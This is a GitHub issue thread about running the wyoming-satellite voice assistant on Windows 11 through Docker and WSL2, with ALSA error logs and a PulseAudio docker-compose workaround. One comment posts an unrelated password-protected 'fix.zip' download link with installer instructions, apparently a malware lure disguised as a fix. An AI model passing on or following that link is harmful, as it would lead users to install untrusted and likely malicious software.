### ISSUE TITLE
Stream UDP microphone to satellite or use WSL2

### ISSUE THREAD

**Issue by flinthamm** [rhasspy/wyoming-satellite#213]
First off... a massive shout out to all the contributors (but especially @synesthesiam) for Rhasspy and all the amazing work going into offline line voice recognition - Thank you - I watch with interest;

Getting straight to the point, I'm looking for the best way to get this project working from Docker but on the Windows 11 (23H2) O.S.. After much trial and error, I've successfully managed to stream the microphone (via UDP) to Rhasspy (running in Docker) and can get wake word and recognition which is great.

I'm now keen to keep up with the latest advances and hence the desire to use this more active project. I've been struggling to understand how to do the same, as all examples and the project in general is of course all aimed towards Linux. Unfortunately, I need to get this working with Windows, so I'm hoping someone maybe able to guide me in the right direction.

The latest WSL2 looked very promising together with Windows 11 but I'm unsure how to adapt the docker container or aplay/arecord commands to support it. See [Playing sound in Docker container on WSL in Windows 11](https://stackoverflow.com/questions/68310978/playing-sound-in-docker-container-on-wsl-in-windows-11/68316880#68316880), as unmodified attempts have failed as there is no sound card device.

This post "[Can we use this project on macbook directly](https://github.com/rhasspy/wyoming-satellite/issues/75)" gave me hope and consequently my latest thoughts, as a last alternative, are to run the program natively but before doing this, I was really hoping there was a solution using Docker and hence this post.  

Keep up this amazing work and hopefully somewhere down the line, I'll be able to contribute something - even if only guides or research!

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tannisroot** [comment]
If you can create an ALSA device inside the container it can work with anything

**Comment by flinthamm** [comment]
Hi @tannisroot, appreciate the comment. The trouble is I've not found any evidence to suggest this can work with Docker/Podman in Windows. Do you by chance have any pointers or experience of this setup working yourself?

**Comment by tannisroot** [comment]
No, I've stopped using Windows as my main OS ages ago, sorry.
But based on a quick google search, I would look into WSL2 + USB Passthrough, with the microphone being a USB one

**Comment by RheaAyase** [comment]
I'm also surprised to see that there isn't any sort of Windows support. We're talking about **HOME** assistant features here - it's unlikely that the whole household runs on Linux.

**Comment by flinthamm** [comment]
Thanks for this feedback @mateuszdrab much appreciated, as I'm sure others will too. I'm still looking at various options but this now gives me a reason to revisit this one. 👍

**Comment by plohoj** [comment]
@mateuszdrab, this method still works for you. I tried all sorts of solutions, but I still can't get wyoming-satellite to run in WSL. I can successfully run VLC interface from WSL. I followed your instructions exactly, but I get an error when starting:
```log
INFO:root:Ready
INFO:root:Connected to services
ALSA lib confmisc.c:855:(parse_card) cannot find card '0'
ALSA lib conf.c:5180:(_snd_config_evaluate) function snd_func_card_inum returned error: No such file or directory
ALSA lib confmisc.c:422:(snd_func_concat) error evaluating strings
ALSA lib conf.c:5180:(_snd_config_evaluate) function snd_func_concat returned error: No such file or directory
ALSA lib confmisc.c:1334:(snd_func_refer) error evaluating name
ALSA lib conf.c:5180:(_snd_config_evaluate) function snd_func_refer returned error: No such file or directory
ALSA lib conf.c:5703:(snd_config_expand) Evaluate error: No such file or directory
ALSA lib pcm.c:2666:(snd_pcm_open_noupdate) Unknown PCM default
arecord: main:831: audio open error: No such file or directory
WARNING:root:Mic service disconnected
```

**Comment by DeekyJay** [comment]
Similar to what mateuszdrab suggested, you can also do the following if you have the containers separated (for whatever reason).

In the `Dockerfile` of both `wyoming-mic-external` and `wyomining-snd-external` change the following:
```
RUN apt-get update && \
    apt-get install --yes --no-install-recommends alsa-utils
```
To this:
```
RUN apt-get update && \
    apt-get install --yes --no-install-recommends alsa-utils libasound2-plugins*
```

And this ended up being my docker-compose file (I built the images with a different name since I modified the Dockerfiles:
```yaml
services:
  microphone:
    image: "deek/wyoming-mic-external"
    ports:
      - "10600:10600"
    environment:
      - PULSE_SERVER=tcp:10.5.0.2
    command:
      - "--device"
      - "pulse"
      - "--debug"

  playback:
    image: "deek/wyoming-snd-external"
    ports:
      - "10601:10601"
    environment:
      - PULSE_SERVER=tcp:10.5.0.2
    command:
      - "--device"
      - "pulse"
      - "--debug"

  satellite:
    image: "deek/wyoming-satellite"
    ports:
      - "10700:10700"
    command:
      - "--name"
      - "my satellite"
      - "--mic-uri"
      - "tcp://microphone:10600"
      - "--snd-uri"
      - "tcp://playback:10601"
      - "--debug"
    depends_on:
      - microphone
      - playback
```
